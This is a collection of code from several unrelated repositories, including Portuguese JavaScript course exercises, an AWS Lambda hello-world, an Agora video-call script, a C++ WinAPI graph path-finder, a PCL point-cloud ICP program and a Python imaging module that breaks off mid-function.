console.log(objProfessor);
console.log("acessando propriedades do objeto");
console.log(objProfessor.nome);
console.log(objProfessor.curso);
objProfessor.nome;
objProfessor.curso;
console.log("chamando o método do objeto professor: objProfessor.ministrarAula()");
objProfessor.mistrarAula();
<file_sep>var curso= " Fromação JavaScript";
console.log(" Ol<NAME>ja Bem o Vindo ao Curso" + curso);
for (let index =0; index < 10; index++) {
console.log(index);
}
console.log("Esse Curso é 10!!");<file_sep># Exercícios de JavaScript
# Execução de código JS com evento onload
```js
//declaração de váriaveis
var nome = "<NAME>";
var sobreNome= "Jordan";
console.log("Instrução solta em um arquivo JS");
//declaração de função
function exibirNomeConsole(){
console.log("exibir nome" + nome);
}
function exibirNomeCompleto(){
console.log("Professor, nome completo" + nome + "" + sobreNome);
}
//chamadas de função
exibirNomeConsole();
```
# Entendendo a Execução de código JS
```js
//declaração de váriaveis
var nome = "<NAME>";
var sobreNome= "Jordan";
console.log("Instrução solta em um arquivo JS");
//declaração de função
function exibirNomeConsole(){
console.log("exibir nome" + nome);
}
exibirNomeConsole();
```
# Execução de código JS com evento onclick
```js
//declaração de váriaveis
var nome = "<NAME>";
var sobreNome= "Jordan";
console.log("Instrução solta em um arquivo JS");
//declaração de função
function exibirNomeConsole(){
console.log("exibir nome" + nome);
}
function exibirNomeCompleto(){
console.log("Professor, nome completo" + nome + "" + sobreNome);
}
function eventoClick(){
alert("Você clicou em um botão")
}
//chamadas de função
exibirNomeConsole();
```
# Exemplo Programação Sincrona
```js
var curso= " Fromação JavaScript";
console.log(" Olá Seja Bem o Vindo ao Curso" + curso);
for (let index =0; index < 10; index++) {
console.log(index);
}
console.log("Esse Curso é 10!!");
```
# Formas de carregamento javascript em páginas
```js
console.log("Carregando Js via arquivo Exeterno mesmo domínio");
```
# Programação funcional em JavaScript
```js
function sejaBemVindo(){
console.log("Seja Bem Vindo ao Curso de Javascript");
}
console.log("chamando a função seja bem vindo sejaBemVindo():");
sejaBemVindo();
//POO
var objProfessor ={
nome: "Prof. <NAME>",
curso: "Formação JavaScript",
mistrarAula: function(){
console.log("Ministrando aula de JavaScript");
}
};
console.log("objeto Professor");
console.log(objProfessor);
console.log("acessando propriedades do objeto");
console.log(objProfessor.nome);
console.log(objProfessor.curso);
objProfessor.nome;
objProfessor.curso;
console.log("chamando o método do objeto professor: objProfessor.ministrarAula()");
objProfessor.mistrarAula();
Footer
© 2022 GitHub, Inc.
Footer navigation
Terms
Privacy
```
| dbb00019147dd2a53b718b8969903329eedae281 | [
"JavaScript",
"Markdown"
] | 3 | JavaScript | bitcoinander/Aulas-JavaScript | e473522e5860c6b34c774ad56898893815c0bc8e | 6f57f321271a65858d67f8ba8bd2c2d25874dd13 |
refs/heads/main | <repo_name>BogdanTabor/hello-node-js<file_sep>/index.js
// //OPEN SERVER WITH 'HTTP' MODULE
// const http = require('http');
// const host = 'localhost';
// const port = 8000;
// const requireListener = function (req, res) {
// res.writeHead(200);
// res.end("Hello node");
// };
// const server = http.createServer(requireListener)
// server.listen(port, host, () => {
// console.log(`Server is running on http://${host}:${port}`)
// });
//CODE FOR AWS LAMBDA
exports.handler = async (event) => {
const response = {
statusCode: 200,
body: JSON.stringify('Hello AWS!'),
};
return response;
};
// //GENERATE HTML FROM SERVER
// var http = require('http');
// http.createServer(function(request, respone){
// respone.writeHead(200, {'Content-type':'text/plan'});
// response.end("Hello node");
// }).listen(8000); | a2471f476efeb7877179b8eb820f931c69807097 | [
"JavaScript"
] | 1 | JavaScript | BogdanTabor/hello-node-js | e1b9a986b5c6d68351a2d324349152a504a1406b | c7b1e959db7012d73d765a477e6a2a86ff51c074 |
refs/heads/main | <file_sep>// Helper fn. to handle error
let handleFail = function(err){
console.log("Error : ", err);
};
// Queries the container in which the remote feeds belong
let remoteContainer= document.getElementById("remote-container");
// Helper fn. to add the video stream to remote-container
function addVideoStream(streamId){
let streamDiv=document.createElement("div"); // Create a new div for every stream
streamDiv.id=streamId; // Assigning id to div
streamDiv.style.transform="rotateY(180deg)"; // Takes care of mirror image
remoteContainer.appendChild(streamDiv); // Add new div to container
}
// Helper fn. to remove the video stream from remote-container
function removeVideoStream (evt) {
let stream = evt.stream;
stream.stop();
let remDiv=document.getElementById(stream.getId());
remDiv.parentNode.removeChild(remDiv);
console.log("Remote stream is removed " + stream.getId());
}
// Creating an Agora Client Object
let client = AgoraRTC.createClient({
mode: "rtc", // mode: "live" | "rtc"
codec: "vp8" //codec: "vp8" | "vp9" | "h264"
/* "vp8": Sets the browser to use VP8 for encoding.
"h264": Sets the browser to use H.264 for encoding.
"vp9": This parameter is reserved for future use. */
});
//Initializig the client
client.init(config.app_id,() => console.log("AgoraRTC client initialized") ,handleFail);
// The client joins the channel
client.join(null,"any-channel",null, (uid)=>{
// Stream object associated with your web cam is initialized
let localStream = AgoraRTC.createStream({
audio: true,
video: true,
});
// Associates the stream to the client
localStream.init(function() {
//Plays the localVideo
localStream.play('me');
//Publishes the stream to the channel
client.publish(localStream, handleFail);
},handleFail);
},handleFail);
//When a stream is added to a channel
client.on('stream-added', function (evt) {
client.subscribe(evt.stream, handleFail);
});
//When you subscribe to a stream
client.on('stream-subscribed', function (evt) {
let stream = evt.stream;
addVideoStream(String(stream.getId()));
stream.play(String(stream.getId()));
});
//When a person is removed from the stream
client.on('stream-removed',removeVideoStream);
client.on('peer-leave',removeVideoStream);<file_sep>"# Agora-Video-call-demo"
| 03b2d8902a6800671f3cf1a00482ff43d12f9621 | [
"JavaScript",
"Markdown"
] | 2 | JavaScript | nilisha-jais/Agora-Video-Calling-App | 45695748296c9907e733a8969ff4da36eb8fbd82 | d70efaabe85ebb49785d79e63f34544549bc7de7 |
refs/heads/master | <file_sep>#ifndef QUEUE_HH_INCLUDED
#define QUEUE_HH_INCLUDED
#include <iostream>
/*!
*\file queue.hh
*\brief zawiera definicje klas queue_node, queue
*queue_node - wezel kolejki
*queue - kolejka
*/
/*!
*\brief definicja klasy queue_node
*definicja wezla dla kolejki
*definiuje pojedynczy element bedacy w kolejkce
*/
class queue_node {
public:
queue_node *next; /*! wskaznik na nastepny */
int data; /*! dane */
};
/*!
*\brief definicja klasy queue
*definicja kolejki
*ADT, kolejka typu FIFO
*zimplementowaa na liscie
*/
class queue {
public:
queue_node *first; /*! wskaznik na pierwszy element */
queue_node *last; /*! wskaznik na ostatni element */
public:
bool is_empty()const;
/*!
*\brief definicja metody push
*dodaje element na koniec kolejki
*\param element dodawany element
*/
void push(int element);
/*!
*\brief definicja metody pop
*usuwa element z poczatku kolejki
*/
void pop();
/*!
*\brief definicja destruktora
*/
~queue();
/*!
*\brief desfinicja konstruktora bezparametrycznego
*ustawia wskazniki na NULL
*/
queue() : first(NULL), last(NULL) {}
/*!
*\brief definicja metody print
*wyswietla zawartosc kolejki
*/
void print()const;
int front(void);
};
#endif // QUEUE_HH_INCLUDED
<file_sep>#ifndef STACK_HH_INCLUDED
#define STACK_HH_INCLUDED
#include <iostream>
/*!
*\file
*\brief definicja struktury danych Lista
*/
/*!
*\brief definicja klasy Lista
*Przechowuje obiekt oraz wskaznik na nastepny i pole rozmiar.
*Zbudowana na szablonie.
*/
template<typename typ>
class Lista {
public:
Lista<typ>* nastepny; /*! wskaznik na nastepny obiekt/element */
typ dane; /*! przechowywana informacja/obiekt/element */
int rozmiar; /*! ilosc elementow/obiektow */
public:
Lista();
~Lista();
void push(typ element);
typ pop();
int size()const;
void wyswietl();
};
/*!
*\brief definicja konstruktora bezparametrycznego
*Zeruje rozmiar, ustawia wskaznik na NULL.
*/
template<typename typ>
Lista<typ>::Lista()
{
nastepny=NULL;
rozmiar=0;
}
/*!
*\brief definicja metody push
*\param [element] dodawany element na koniec listy
*Zwieksza rozmiar, alokuje pamiec, przypisuje element do pola klasy.
*/
template<typename typ>
void Lista<typ>::push(typ element)
{
rozmiar++;
Lista<typ> *tmp=new Lista<typ>;
tmp->dane=element;
tmp->nastepny=nastepny;
nastepny=tmp;
}
/*!
*\brief definicja metody pop
*\return usuwany element
*Ustawia wskaznik na poprzedni element
*zwraca i kasuje ostatni element.
*\return 0 i wyswietla komunikat gdy lista jest pusta.
*/
template<typename typ>
typ Lista<typ>::pop()
{
if(nastepny==NULL)
{
std::cout << "Lista jest pusta." << std::endl;
return 0;
} else {
rozmiar--;
Lista<typ> *tmp=nastepny;
nastepny=tmp->nastepny;
// nastepny=nastepny->nastepny;
return tmp->dane;
delete tmp;
}
}
/*!
*\brief deinicja metody size
*\return ilosc elementow przechowywanych na liscie.
*/
template<typename typ>
int Lista<typ>::size()const
{
return rozmiar;
}
/*!
*\brief definicja destruktora
*Zeruje rozmiar,
*Kasuje wszystkie obiektry/elementy.
*/
template<typename typ>
Lista<typ>::~Lista()
{
while(nastepny!=NULL)
pop();
rozmiar=0;
}
template<typename typ>
void Lista<typ>::wyswietl()
{
Lista<typ> *tmp=nastepny;
while(tmp)
{
std::cout << tmp->dane << std::endl;
tmp=tmp->nastepny;
}
}
#endif // STACK_HH_INCLUDED
<file_sep>#include <iostream>
#include <string>
#include <fstream>
#include <sstream>
#include "graph.hh"
#include "queue.hh"
#include "stack.hh"
#include "format.h"
#include "global.h"
using namespace std;
/*!
*\mainpage program - poznanie osoby x
*\author <NAME>, W.Maluszynski
*\date
*\version 0.1
*
*Program zrealizowany jest z wykorzystaniem funkcji winApi
*W pierwszym polu nalezy wpisac plik zawieracjacy konfiguracje grafu, nastepnie wczytac
*W drugim polu nalezy wpisac identyfikator pierwszej osoby, nastepnie wczytac
*W trzecim polu nalezy wpisac identyfikator drugiej osoby, nastepnie wczytac
*program wyswietla okineko ze znaleziona sciezka
*W przypadku blednej nazwy pliku lub nieznalezienia sciezki
*program zglasza blad
*/
int WINAPI WinMain( HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nCmdShow )
{
//HWND hwnd; /* This is the handle for our window */
MSG messages; /* Here messages to the application are saved */
WNDCLASSEX wincl; /* Data structure for the windowclass */
/* The Window structure */
wincl.hInstance = hThisInstance;
wincl.lpszClassName = szClassName;
wincl.lpfnWndProc = WindowProcedure; /* This function is called by windows */
wincl.style = CS_DBLCLKS; /* Catch double-clicks */
wincl.cbSize = sizeof( WNDCLASSEX );
/* Use default icon and mouse-pointer */
wincl.hIcon = LoadIcon( NULL, IDI_APPLICATION );
wincl.hIconSm = LoadIcon( NULL, IDI_APPLICATION );
wincl.hCursor = LoadCursor( NULL, IDC_ARROW );
wincl.lpszMenuName = NULL; /* No menu */
wincl.cbClsExtra = 0; /* No extra bytes after the window class */
wincl.cbWndExtra = 0; /* structure or the window instance */
/* Use Windows's default colour as the background of the window */
wincl.hbrBackground =( HBRUSH ) COLOR_BACKGROUND;
/* Register the window class, and if it fails quit the program */
if( !RegisterClassEx( & wincl ) )
return 0;
/* The class is registered, let's create the program*/
hwnd = CreateWindowEx(
0, /* Extended possibilites for variation */
szClassName, /* Classname */
_T( "Poznaznie osoby x" ), /* Title Text */
WS_OVERLAPPEDWINDOW, /* default window */
CW_USEDEFAULT, /* Windows decides the position */
CW_USEDEFAULT, /* where the window ends up on the screen */
800, /* The programs width */
400, /* and height in pixels */
HWND_DESKTOP, /* The window is a child-window to desktop */
NULL, /* No menu */
hThisInstance, /* Program Instance handler */
NULL /* No Window Creation data */
);
hStaticDebugBox = CreateWindowEx( 0, "STATIC", NULL, WS_CHILD | WS_VISIBLE | SS_LEFT,
10, 10, 763, 20, hwnd,( HMENU ) ID_STATICTEXTBOX1, hThisInstance, NULL );
hCommandLine = CreateWindowEx( WS_EX_CLIENTEDGE, "EDIT", NULL, WS_CHILD | WS_VISIBLE | WS_BORDER,
10, 40, 763, 20, hwnd,( HMENU ) ID_COMANDLINE, hThisInstance, NULL );
hExecButton = CreateWindowEx( 0, "BUTTON", "Set Graph", WS_CHILD | WS_VISIBLE,
660, 70, 100, 30, hwnd,( HMENU ) ID_BUTTON1, hThisInstance, NULL );
hStaticDebugBox2 = CreateWindowEx( 0, "STATIC", NULL, WS_CHILD | WS_VISIBLE | SS_LEFT,
10, 100, 763, 20, hwnd,( HMENU ) ID_STATICTEXTBOX2, hThisInstance, NULL );
hCommandLine2 = CreateWindowEx( WS_EX_CLIENTEDGE, "EDIT", NULL, WS_CHILD | WS_VISIBLE | WS_BORDER,
10, 140, 763, 20, hwnd,( HMENU ) ID_COMANDLINE, hThisInstance, NULL );
hExecButton2 = CreateWindowEx( 0, "BUTTON", "User 1", WS_CHILD | WS_VISIBLE,
660, 170, 100, 30, hwnd,( HMENU ) ID_BUTTON2, hThisInstance, NULL );
hStaticDebugBox3 = CreateWindowEx( 0, "STATIC", NULL, WS_CHILD | WS_VISIBLE | SS_LEFT,
10, 200, 763, 20, hwnd,( HMENU ) ID_STATICTEXTBOX3, hThisInstance, NULL );
hCommandLine3 = CreateWindowEx( WS_EX_CLIENTEDGE, "EDIT", NULL, WS_CHILD | WS_VISIBLE | WS_BORDER,
10, 240, 763, 20, hwnd,( HMENU ) ID_COMANDLINE, hThisInstance, NULL );
hExecButton3 = CreateWindowEx( 0, "BUTTON", "User 2", WS_CHILD | WS_VISIBLE,
660, 270, 100, 30, hwnd,( HMENU ) ID_BUTTON3, hThisInstance, NULL );
/* Make the window visible on the screen */
ShowWindow( hwnd, nCmdShow );
/* Run the message loop. It will run until GetMessage() returns 0 */
while( GetMessage( & messages, NULL, 0, 0 ) )
{
/* Translate virtual-key messages into character messages */
TranslateMessage( & messages );
/* Send message to WindowProcedure */
DispatchMessage( & messages );
}
/* The program return-value is 0 - The value that PostQuitMessage() gave */
return messages.wParam;
}
/* This function is called by the Windows function DispatchMessage() */
LRESULT CALLBACK WindowProcedure( HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam )
{
switch( message ) /* handle the messages */
{
case WM_DESTROY:
PostQuitMessage( 0 ); /* send a WM_QUIT to the message queue */
break;
case WM_COMMAND:
if( wParam == ID_BUTTON1 )
{
int bufor = 0;
CommandLineBuf =( LPSTR )GlobalAlloc( GPTR, GetWindowTextLength( hCommandLine ) + 1 );
bufor = GetWindowText( hCommandLine, CommandLineBuf, 50 );
// cout << bufor << endl;
SetDlgItemText( hwnd, ID_STATICTEXTBOX1, CommandLineBuf );
plik.open(CommandLineBuf,ios::in);
if(!plik.good())
{
cout << "blad otwarcia pliku." << endl;
MessageBox(hwnd,"blad otwarcia pliku.","Blad",MB_ICONINFORMATION);
return -1;
}
int i,j;
int licznik=0;
while(!plik.eof())
{
plik >> i;
plik >> j;
licznik++;
}
G=new CGraph(j+1,j+1);
plik.close();
plik.open(CommandLineBuf,ios::in);
for(int k=0;k<licznik;k++)
{
plik >> i;
plik >> j;
G->set_graph(i,j);
}
GlobalFree( CommandLineBuf );
}
if( wParam == ID_BUTTON2 )
{
int bufor = 0;
CommandLineBuf =( LPSTR )GlobalAlloc( GPTR, GetWindowTextLength( hCommandLine2 ) + 1 );
bufor = GetWindowText( hCommandLine2, CommandLineBuf, 50 );
SetDlgItemText( hwnd, ID_STATICTEXTBOX2, CommandLineBuf );
start_path = strtod(CommandLineBuf, NULL );
GlobalFree( CommandLineBuf );
}
if( wParam == ID_BUTTON3 )
{
int bufor = 0;
CommandLineBuf =( LPSTR )GlobalAlloc( GPTR, GetWindowTextLength( hCommandLine3 ) + 1 );
bufor = GetWindowText( hCommandLine3, CommandLineBuf, 50 );
SetDlgItemText( hwnd, ID_STATICTEXTBOX3, CommandLineBuf );
end_path=strtod(CommandLineBuf,NULL);
if(!G->BFSPath(start_path,end_path,&C))
{
MessageBox(hwnd,"Sciezka do poznania osoby nie zostala odnaleziona.","Blad",MB_ICONINFORMATION);
C.~Lista<int>();
break;
}
tmp_string=ZamienFormat(&C);
MessageBox(hwnd,tmp_string,"Najszybsza sciezka do poznania osoby.",MB_ICONINFORMATION);
C.~Lista<int>();
GlobalFree( CommandLineBuf );
}
default: /* for messages that we don't deal with */
return DefWindowProc( hwnd, message, wParam, lParam );
}
return 0;
}
/*
int main()
{
fstream plik;
plik.open("facebook_combined.txt",ios::in);
if(!plik.good())
{
cout << "blad otwarcia pliku." << endl;
return -1;
}
int i,j;
int licznik=0;
while(!plik.eof())
{
plik >> i;
plik >> j;
licznik++;
}
CGraph *G=new CGraph(j+1,j+1);
plik.close();
plik.open("facebook_combined.txt",ios::in);
for(int k=0;k<licznik;k++)
{
plik >> i;
plik >> j;
G->set_graph(i,j);
}
G->BFSPath(0,4038);
plik.close();
return 0;
}
*/
<file_sep>#ifndef GRAPH_HH_INCLUDED
#define GRAPH_HH_INCLUDED
#include <fstream>
#include "stack.hh"
/*!
*\file graph.hh
*\brief zwiera definicje klas CNode, CEdge, CGrpah
*CNode - wezel grafu
*CEdge - krawedz grafu
*CGraph - graf
*/
/*!
*\brief definicja klasy CNode
*definiuje pojedynczy wezel grafu
*/
class CNode {
friend class CEdge;
friend class CGraph;
int value; /*! element przechowywany w wezle */
};
/*!
*\brief definicja klasy CEdge
*definuje krawedz grafu
*nie zawiera wag
*/
class CEdge {
friend class CGraph;
CNode *prev; /*! wskaznik na poprzedni wezel */
CNode *next; /*! wskaznik na nastepny wezel */
};
/*!
*\brief definicja klasy CGraph
*definije graf skierowany
*bez wagowaych krawedzi
*dziedzicy po klasie CBenchmark
*/
class CGraph {
public:
int V; /*! ilosc wezlow */
int E; /*! ilosc krawedzi */
int **matrix; /*! macierz sasiedztwa */
bool* visited; /*! lista odwiedzonych elementow grafu */
public:
/*!
*\brief definicja konstruktora parametrycznego
*alokuje pamiec dla tablic wezlow krawdzi oraz dla macierzy sasiedztwa
*\param v ilosc wezlow
*\param e ilosc krawedzi
*/
CGraph(int v, int e);
/*!
*\brief definicja destruktora
*/
~CGraph();
/*!
*\brief definicja metody set_graph
*wiaze wezly wskaznikami
*krawdziom ustawia odpowiednie wezly
*wypelnia macierz sasiedztwa
*\param edge1 krawdz do ktorej przypisujemy poszczegolne wierzcholki
*\param vertice1 przypisywany pierwszy wierzcholek
*\param vertice2 przypisywany drugi wierzcholek
*/
void set_graph(int vertice1, int vertice2);
/*!
*\brief definicja metody print_maatrix
*wyswietla macierz sasiedztwa
*/
void print_matrix()const;
/*!
*\brief definicja metody DFSing
*przeszukuje graf algorytmem DFS (przeszukiwanie w glab)
*zaimplementowana rekuencyjnie
*wykorzystana w metodzie DFS wyposarzonej w timery
*\param v element poczatkowy od ktorego algorytm rozpoczyna przeszukiwanie
*/
void DFS(int v);
/*!
*\brief definicja metody DFS
*wywoluje metode DFSing
*posiada timery zapisujace zmierzony czas do pliku
*\param v element poczatkowy od ktorego algorytm DFS rozpoczyna przeszukiwanie
*/
void BFS(int v);
/*!
*\brief definicja metody save_matrix
*zapsiuje macierz saciedztwa do pliku
*\param file uchwyt do pliku
*/
void save_matrix(std::fstream& file)const;
/*!
*\brief definicja metody BFSPath
*Oblicza najszybsza sciezke w grafie
*miedzy punktem startowym, a koncowym
*i zapisuje ja na stosie
*\param start punkt startowy
*\param meta punkt koncowy
*\param *L wskaznik do stosu,
*na ktorym sa zapisane elementy
*/
bool BFSPath(int start, int meta, Lista<int> *L);
};
#endif // GRAPH_HH_INCLUDED
<file_sep>#include "queue.hh"
#include <iostream>
/*!
*\file queue.cpp
*\brief implementuje zdefiniowana klase kolejki
*/
void queue::push(int element)
{
queue_node *tmp = new queue_node();
tmp->next=NULL;
tmp->data=element;
if(last)
last->next=tmp;
else
first=tmp;
last=tmp;
}
void queue::pop()
{
if(first)
{
queue_node* tmp=first;
first=first->next;
if(!first)
last = NULL;
delete tmp;
}
}
void queue::print()const
{
queue_node *tmp=first;
if(!first)
std::cout << std::endl;
else
while(tmp->next!=NULL)
{
std::cout << tmp->data << " ";
tmp=tmp->next;
}
std::cout << std::endl;
}
queue::~queue()
{
while(first)
pop();
}
bool queue::is_empty()const
{
if(first && last)
return false;
else
return true;
}
int queue::front(void)
{
if(first) return first->data;
else return -2147483647;
}
<file_sep>#ifndef GLOBAL_H_INCLUDED
#define GLOBAL_H_INCLUDED
#include <windows.h>
/*!
*\file
*przechowuje zmienne globalne
*/
#if defined(UNICODE) && !defined(_UNICODE)
#define _UNICODE
#elif defined(_UNICODE) && !defined(UNICODE)
#define UNICODE
#endif
#include <tchar.h>
#include <windows.h>
#include <iostream>
#define ID_BUTTON1 101
#define ID_BUTTON2 102
#define ID_BUTTON3 103
#define ID_STATICTEXTBOX1 201
#define ID_STATICTEXTBOX2 202
#define ID_STATICTEXTBOX3 203
#define ID_COMANDLINE 301
/* Declare Windows procedure */
LRESULT CALLBACK WindowProcedure( HWND, UINT, WPARAM, LPARAM );
/* Make the class name into a global variable */
TCHAR szClassName[] = _T( "WindowsApp" );
/* Uchwyty do kontrolek */
HWND hCommandLine;
HWND hExecButton;
HWND hStaticDebugBox;
HWND hCommandLine2;
HWND hExecButton2;
HWND hStaticDebugBox2;
HWND hCommandLine3;
HWND hExecButton3;
HWND hStaticDebugBox3;
/* Bufor przechowuje tekst wpisany do textboksa */
LPSTR CommandLineBuf;
using std::cout;
using std::endl;
fstream plik;
Lista<int> C;
int i,j;
int licznik=0;
int start_path;
int end_path;
CGraph *G;
LPSTR tmp_string;
HWND hwnd; /* This is the handle for our window */
#endif // GLOBAL_H_INCLUDED
<file_sep>#ifndef FORMAT_H_INCLUDED
#define FORMAT_H_INCLUDED
#include <string>
#include <windows.h>
using namespace std;
/*!
*\file
*przechowuje funkcje konwertujace
*string
*/
/*!
*\brief definicja funkcji intToString
*konwersja ina na string
*\param n zadany int
*\return zwracany string
*/
string intToStr(int n)
{
string tmp, ret;
if(n < 0) {
ret = "-";
n = -n;
}
do {
tmp += n % 10 + 48;
n -= n % 10;
}
while(n /= 10);
for(int i = tmp.size()-1; i >= 0; i--)
ret += tmp[i];
return ret;
}
/*!
*\brief definicja funkcji
*zamienia liste intow(sciezka w grafie) na LPSTR
*\param *C wskaznik na liste
*\return sciezka w formacie LPSTR
*/
LPSTR ZamienFormat(Lista<int> *C)
{
Lista<int> *tmp=C;
string pom;
string pom1;
tmp=tmp->nastepny;
for(int i=0;tmp;i++)
{
pom1 = intToStr(tmp->dane);
pom=pom+"->";
pom=pom+pom1;
tmp=tmp->nastepny;
}
LPSTR s = const_cast<char *>(pom.c_str());
return s;
}
#endif // FORMAT_H_INCLUDED
<file_sep>#include "graph.hh"
#include "queue.hh"
#include "stack.hh"
//#include "global.h"
#include <iostream>
#include <fstream>
#include <windows.h>
/*!
*\file graph.cpp
*\brief implementuje zdefiniowana klase grafu
*/
void CGraph::save_matrix(std::fstream& file)const
{
for(int i=0; i <V; i++)
{
for(int j=0; j<V; j++)
file << matrix[i][j] << " ";
file << std::endl;
}
}
CGraph::CGraph(int v, int e) : V(v), E(e)
{
matrix = new int*[V];
for(int i=0; i<V; i++)
{
matrix[i] = new int[V];
}
for(int i=0; i<V; i++)
for(int j=0; j<V; j++)
matrix[i][j]=0;
visited = new bool[v];
}
CGraph::~CGraph()
{
for(int i=0; i<V; i++)
{
delete [] matrix[i];
}
delete [] matrix;
delete [] visited;
}
void CGraph::set_graph(int verticle1, int verticle2)
{
matrix[verticle1][verticle2]=1;
matrix[verticle2][verticle1]=1;
}
void CGraph::print_matrix()const
{
for(int i=0; i <V; i++)
{
for(int j=0; j<V; j++)
std::cout << matrix[i][j] << " ";
std::cout << std::endl;
}
}
void CGraph::DFS(int v)
{
visited[v]=1;
std::cout << v << " ";
for(int i=0; i<V; i++)
{
if(matrix[v][i]==1 and visited[i]==0)
DFS(i);
}
}
void CGraph::BFS(int v)
{
int i;
queue_node *q;
queue *x=new queue;
x->push(v);
visited[v]=true;
while(x->first)
{
v=x->first->data;
x->pop();
std::cout << v << " ";
for(i=0; i<V; i++)
if((matrix[v][i]==1) && !visited[i])
{
x->push(i);
visited[i]=true;
}
}
x->~queue();
std::cout << std::endl;
}
bool CGraph::BFSPath(int start, int meta, Lista<int> *L)
{
queue k;
bool found;
int v, u, i;
for(int i=0; i<V; i++)
visited[i]=0;
int *P=new int[V];
P[start]=-1;
k.push(start);
visited[start]=true;
found=false;
while(!k.is_empty())
{
v=k.front();
k.pop();
if(v==meta)
{
found=true;
break;
}
for(int i=1; i<V; i++)
if(!visited[i] && matrix[v][i]==1)
{
P[i] = v;
k.push(i);
visited[i] = true;
}
}
if(!found)
{
std::cout << "sciezka nie zostala odnaleziona" << std::endl;
return false;
// MessageBox(hwnd,"Sciezka nie zostala odnaleziona","Blad",MB_ICONINFORMATION);
}
else
while(v>-1)
{
L->push(v);
// std::cout << v << " ";
v=P[v];
}
L->wyswietl();
return true;
}
| 38c17d547906166b82e3d15f7297e600f687159a | [
"C++"
] | 8 | C++ | makuchwo/209429 | badb2bae60b9fb8451966914083af18501c71a8b | 777920e3311d24795ebd3ee15aa7294c92a93514 |
refs/heads/master | <file_sep>#include <iostream>
#include <pcl/io/pcd_io.h>
#include <pcl/point_types.h>
#include <list>
#include <ctime>
#include <pcl/registration/icp.h>
using namespace std;
using namespace pcl;
int main (int argc, char** argv)
{
pcl::PointCloud<pcl::PointXYZ>::Ptr cloud_in (new pcl::PointCloud<pcl::PointXYZ>);
pcl::PointCloud<pcl::PointXYZ>::Ptr cloud_out (new pcl::PointCloud<pcl::PointXYZ>);
pcl::IterativeClosestPoint<pcl::PointXYZ, pcl::PointXYZ> icp;
// Fill in the CloudIn data
pcl::io::loadPCDFile("./1.pcd", *cloud_in);
pcl::io::loadPCDFile("./2.pcd", *cloud_out);
icp.setInputCloud(cloud_in);
icp.setInputTarget(cloud_out);
// Set the max correspondence distance to 5cm (e.g., correspondences with higher distances will be ignored)
icp.setMaxCorrespondenceDistance (5);
// Set the maximum number of iterations (criterion 1)
icp.setMaximumIterations (50000000);
// Set the transformation epsilon (criterion 2)
icp.setTransformationEpsilon (1e-18);
// Set the euclidean distance difference epsilon (criterion 3)
icp.setEuclideanFitnessEpsilon (0.001);
// Obtain the transformation that aligned cloud_source to cloud_source_registered
//Eigen::Matrix4f transformation = icp.getFinalTransformation ();
pcl::PointCloud<pcl::PointXYZ> Final;
icp.align(Final);
std::cout << "has converged:" << icp.hasConverged() << " score: " <<
icp.getFitnessScore() << std::endl;
std::cout << icp.getFinalTransformation() << std::endl;
pcl::io::savePCDFileASCII("./outdata.pcd",Final);
return (0);
}
| 35b8f9c950ffcab3f03148f2c8a79983ffba8119 | [
"C++"
] | 1 | C++ | x86isnice/ICP | 11a08da88eb632574b6307db1a6261e10b0a51fe | b6c399a54733ba626acf6b5b5534369ca35ac073 |
refs/heads/master | <repo_name>johannesmaxkappel/iospy<file_sep>/iospy.py
'''
Basic image processing functions for imaging data from NeuroCCD camera
Copyright <NAME> & E.Chong 2017
'''
from scipy.ndimage import fourier_gaussian
import numpy as np
from skimage import exposure
import matplotlib.pyplot as plt
import seaborn as sns
import cv2
import sys
import os
sns.set_style('white')
def read_data(filepath, dFrame = True):
fn = open(filepath, 'rb')
header = fn.read(2880)
pixels = np.fromstring(fn.read(), dtype='int16')
header = [header[i:i + 80] for i in range(0, len(header), 80)]
# remove all whitespaces
for i, h in enumerate(header):
header[i] = h.replace(' ', '')
for h in header:
if h == 'END':
break
else:
param, value = h.split('=')
if param == 'NAXIS1':
width = int(value)
elif param == 'NAXIS2':
height = int(value)
elif param == 'NAXIS3':
nFrames = int(value)
else:
pass
nPixels = width * height
print 'Resolution:{0}x{1}'.format(width, height)
print 'Number of pixels:', nPixels
sys.stdout.flush()
trialframes = []
for frameno in range(0, nFrames+1):
frame = pixels[frameno * nPixels:(frameno + 1) * nPixels]
frame = np.reshape(frame, (width, height))
frame = frame.astype('float64')
trialframes.append(frame)
print 'Number of processed frames:', len(trialframes)
sys.stdout.flush()
darkframe = trialframes[nFrames]
if dFrame:
for frameno, frame in enumerate(trialframes):
frame = frame - darkframe
trialframes[frameno] = frame
return trialframes
def compute_average(trialframes, t1=500, t2=1600):
blframes_mean = np.mean(trialframes[10:t1-10], axis=0)
oframes_mean = np.mean(trialframes[t1+10:t2-10], axis=0)
odor_normed = (oframes_mean-blframes_mean)/oframes_mean
odor_normed[~ np.isfinite(odor_normed)] = odor_normed.min()
return odor_normed
def plot_signal(trialframes, t1, t2):
blframes_mean = np.mean(trialframes[10:t1-10], axis=0)
oframes = trialframes[t1+10:t2-10]
oframes_seq = []
for oframe in oframes:
oframe_r = (oframe - blframes_mean)/blframes_mean
oframes_seq.append(np.mean(oframe_r))
plt.plot([x for x in range(0, len(oframes_seq))], [np.mean(frame) for frame in oframes_seq])
plt.show()
pass
def rescale_int(im, lower=2, upper=98):
v_min, v_max = np.percentile(im, (lower, upper))
return exposure.rescale_intensity(im, in_range=(v_min, v_max))
def normalize(im):
min_img = im - im.min()
return (min_img / min_img.max())
def convert_dtype(im):
im = im * 2 ** 16
return im.astype('uint16')
def process_im(im,
scale=85,
int_lower=2,
int_upper=98,
cut=(0,256),
bpass=True,
resc_int=True
):
width, height = im.shape
odor_normed = im[cut[0]:cut[1], ]
lframe = np.split(odor_normed, 2, axis=1)[0]
rframe = np.split(odor_normed, 2, axis=1)[1]
pframes = []
for split in [lframe, rframe]:
split = normalize(split)
if resc_int:
split = rescale_int(split, lower=int_lower, upper=int_upper)
pframes.append(split)
a = np.concatenate(pframes, axis=1)
if bpass:
a = bp_fft(a, scale=scale)
a = normalize(a)
if cut != (0,256):
a = np.ravel(a)
r1 = np.zeros(width * (cut[0]))
r2 = np.zeros(width * (width - cut[1]))
a = np.insert(a, 0, r1, axis=0)
a = np.insert(a, cut[1] * width, r2, axis=0)
a = np.reshape(a, (width, height))
a = convert_dtype(a)
return a
def bp_fft(im, scale=85):
sigma = scale * 0.15
input_im = np.fft.fft2(im)
low = fourier_gaussian(input_im, sigma=sigma)
input_im = input_im - low
high = fourier_gaussian(input_im, sigma=0.3)
